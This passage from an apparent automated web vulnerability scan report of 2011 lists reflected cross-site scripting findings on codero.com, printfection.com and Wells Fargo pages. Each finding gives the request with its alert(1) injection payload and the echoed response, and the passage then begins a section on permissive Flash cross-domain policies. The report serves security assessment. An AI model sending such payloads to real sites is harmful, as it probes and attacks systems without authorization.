The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46256"><script>alert(1)</script>9e0d96ee923 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images46256"><script>alert(1)</script>9e0d96ee923/design/banner_i7-promo.png?time=1308602405 HTTP/1.1
Host: www.codero.com
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=59liuo1tqqa3fjr243l6e846j4

Response

HTTP/1.1 404 This page does not exist
Date: Tue, 19 Jul 2011 02:01:31 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 31995
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="X-UA-Compatible" c
...[SNIP]...
<link rel="canonical" href="http://www.codero.com/images46256"><script>alert(1)</script>9e0d96ee923/design/banner_i7-promo.png" />
...[SNIP]...

2.18. http://www.codero.com/images/design/menu_i7-promo.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.codero.com
Path:   /images/design/menu_i7-promo.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e31e5"><script>alert(1)</script>204885c9e13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imagese31e5"><script>alert(1)</script>204885c9e13/design/menu_i7-promo.png?time=1308602405 HTTP/1.1
Host: www.codero.com
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=59liuo1tqqa3fjr243l6e846j4

Response

HTTP/1.1 404 This page does not exist
Date: Tue, 19 Jul 2011 02:01:23 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 32035
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="X-UA-Compatible" c
...[SNIP]...
<link rel="canonical" href="http://www.codero.com/imagese31e5"><script>alert(1)</script>204885c9e13/design/menu_i7-promo.png" />
...[SNIP]...

2.19. http://www.codero.com/images/design/rc_i7-promo.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.codero.com
Path:   /images/design/rc_i7-promo.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b9b7"><script>alert(1)</script>82f9782ebb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images7b9b7"><script>alert(1)</script>82f9782ebb1/design/rc_i7-promo.jpg?time=1308602405 HTTP/1.1
Host: www.codero.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.codero.com/images106c4%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E1ca562d2af6/design/banner_certified-expertise.png?time=1308058010

Response

HTTP/1.1 404 This page does not exist
Date: Tue, 19 Jul 2011 02:06:00 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 32032
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="X-UA-Compatible" c
...[SNIP]...
<link rel="canonical" href="http://www.codero.com/images7b9b7"><script>alert(1)</script>82f9782ebb1/design/rc_i7-promo.jpg" />
...[SNIP]...

2.20. http://www.printfection.com/torprojectstore [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.printfection.com
Path:   /torprojectstore

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2bc9"-alert(1)-"2effdd3df20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /torprojectstore?d2bc9"-alert(1)-"2effdd3df20=1 HTTP/1.1
Host: www.printfection.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:27 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 01:59:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; httponly
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; domain=https://www.printfection.com; httponly
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; domain=https://printfection.com; httponly
Vary: Accept-Encoding
Content-Length: 29535
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

       
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
...[SNIP]...
Tracker = _gat._getTracker("UA-277384-1");
           gaTracker._setDomainName("none");
           gaTracker._setAllowLinker(true);
           gaTracker._setAllowHash(false);
           gaTracker._trackPageview("/torprojectstore?d2bc9"-alert(1)-"2effdd3df20=1");
           
                       
       }catch(err){}
   
               
               </script>
...[SNIP]...

2.21. http://www.printfection.com/torprojectstore/T-Shirt/_p_4740139 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.printfection.com
Path:   /torprojectstore/T-Shirt/_p_4740139

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1298"-alert(1)-"886ff40fc2f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /torprojectstore/T-Shirt/_p_4740139a1298"-alert(1)-"886ff40fc2f HTTP/1.1
Host: www.printfection.com
Proxy-Connection: keep-alive
Referer: http://www.printfection.com/torprojectstore
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; __utma=1.24107.1311040768.1311040768.1311040768.1; __utmb=1.1.10.1311040768; __utmc=1; __utmz=1.1311040768.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:04:22 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:04:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; httponly
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; domain=https://www.printfection.com; httponly
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; domain=https://printfection.com; httponly
Vary: Accept-Encoding
Content-Length: 29551
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

       
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
...[SNIP]...
tTracker("UA-277384-1");
           gaTracker._setDomainName("none");
           gaTracker._setAllowLinker(true);
           gaTracker._setAllowHash(false);
           gaTracker._trackPageview("/torprojectstore/T-Shirt/_p_4740139a1298"-alert(1)-"886ff40fc2f");
           
                       
       }catch(err){}
   
               
               </script>
...[SNIP]...

2.22. http://www.printfection.com/torprojectstore/T-Shirt/_p_4740139 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.printfection.com
Path:   /torprojectstore/T-Shirt/_p_4740139

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8069"-alert(1)-"9cdd008e860 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /torprojectstore/T-Shirt/_p_4740139?a8069"-alert(1)-"9cdd008e860=1 HTTP/1.1
Host: www.printfection.com
Proxy-Connection: keep-alive
Referer: http://www.printfection.com/torprojectstore
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; __utma=1.24107.1311040768.1311040768.1311040768.1; __utmb=1.1.10.1311040768; __utmc=1; __utmz=1.1311040768.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:03:21 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:03:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; httponly
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; domain=https://www.printfection.com; httponly
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; domain=https://printfection.com; httponly
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 178385

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

       
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
...[SNIP]...
Tracker("UA-277384-1");
           gaTracker._setDomainName("none");
           gaTracker._setAllowLinker(true);
           gaTracker._setAllowHash(false);
           gaTracker._trackPageview("/torprojectstore/T-Shirt/_p_4740139?a8069"-alert(1)-"9cdd008e860=1");
           
                       
       }catch(err){}
   
               
               </script>
...[SNIP]...

2.23. https://www.wellsfargo.com/locator/atm/search [txtCity parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.wellsfargo.com
Path:   /locator/atm/search

Issue detail

The value of the txtCity request parameter is copied into the HTML document as text between TITLE tags. The payload cdf27</title><a>c2100b7621f was submitted in the txtCity parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /locator/atm/search?txtCity=cdf27</title><a>c2100b7621f&selState=&user=wb&txtZip1=10010 HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wachovia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; JSESSIONID=B284C92801BBB527ED6675DA0225B0AC; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:52:01 GMT
Content-type: text/html; charset=ISO-8859-1
Content-Length: 30264


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
...[SNIP]...
<title>Banks and ATMs in Cdf27</title><a>c2100b7621f 10010 - Wells Fargo Banking Locations</title>
...[SNIP]...

2.24. https://online.wellsfargo.com/das/channel/enrollDisplay [wfacookie cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /das/channel/enrollDisplay

Issue detail

The value of the wfacookie cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acbdc"><script>alert(1)</script>e346e472bc6 was submitted in the wfacookie cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /das/channel/enrollDisplay HTTP/1.1
Host: online.wellsfargo.com
Connection: keep-alive
Referer: https://online.wellsfargo.com/signon?LOB=CONS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411acbdc"><script>alert(1)</script>e346e472bc6; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=LOB=CONS

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:48:04 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-store, no-cache, private, must-revalidate
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
KONICHIWA5: enrollment/enrollIdentify
Set-Cookie: KCOOKIE=; domain=.wellsfargo.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/; secure
Set-Cookie: BRAND_COOKIE=COB; domain=.wellsfargo.com; path=/; secure
Content-Language: en-US
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 13764


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...
<img
                                       src="https://adfarm.mediaplex.com/ad/bk/994-1668-2054-5?COL01STO=1&Unique_ID=B-20110719024057407636411acbdc"><script>alert(1)</script>e346e472bc6"
                                       border="0" height="1" width="1" alt="">
...[SNIP]...

2.25. https://online.wellsfargo.com/das/channel/enrollDisplay [wfacookie cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /das/channel/enrollDisplay

Issue detail

The value of the wfacookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae8eb'-alert(1)-'cf811bce440 was submitted in the wfacookie cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /das/channel/enrollDisplay HTTP/1.1
Host: online.wellsfargo.com
Connection: keep-alive
Referer: https://online.wellsfargo.com/signon?LOB=CONS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411ae8eb'-alert(1)-'cf811bce440; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=LOB=CONS

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:48:07 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-store, no-cache, private, must-revalidate
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
KONICHIWA5: enrollment/enrollIdentify
Set-Cookie: KCOOKIE=; domain=.wellsfargo.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/; secure
Set-Cookie: BRAND_COOKIE=COB; domain=.wellsfargo.com; path=/; secure
Content-Language: en-US
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 13734


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...
<!--
                                       ROItag('994-1668-2054-5', 'COL01STO=1', 'Unique_ID=B-20110719024057407636411ae8eb'-alert(1)-'cf811bce440')
                                       -->
...[SNIP]...

3. Flash cross-domain policy
There are 28 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Tue, 19 Jul 2011 01:58:24 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.2. https://adfarm.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://adfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Tue, 19 Jul 2011 10:03:28 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.3. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Type: application/xml
Expires: Wed, 20 Jul 2011 01:58:26 GMT
Date: Tue, 19 Jul 2011 01:58:26 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

3.4. http://c.atdmt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT
Accept-Ranges: bytes
ETag: "044698a197dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 19 Jul 2011 12:09:36 GMT
Connection: keep-alive
Content-Length: 109

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.5. http://c.scout.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.scout.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT
Accept-Ranges: bytes
ETag: "044698a197dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 19 Jul 2011 12:04:44 GMT
Connection: keep-alive
Content-Length: 109

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.6. http://cdn-cms.scout.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn-cms.scout.com
Path:   /crossdomain.xml

Issue detail

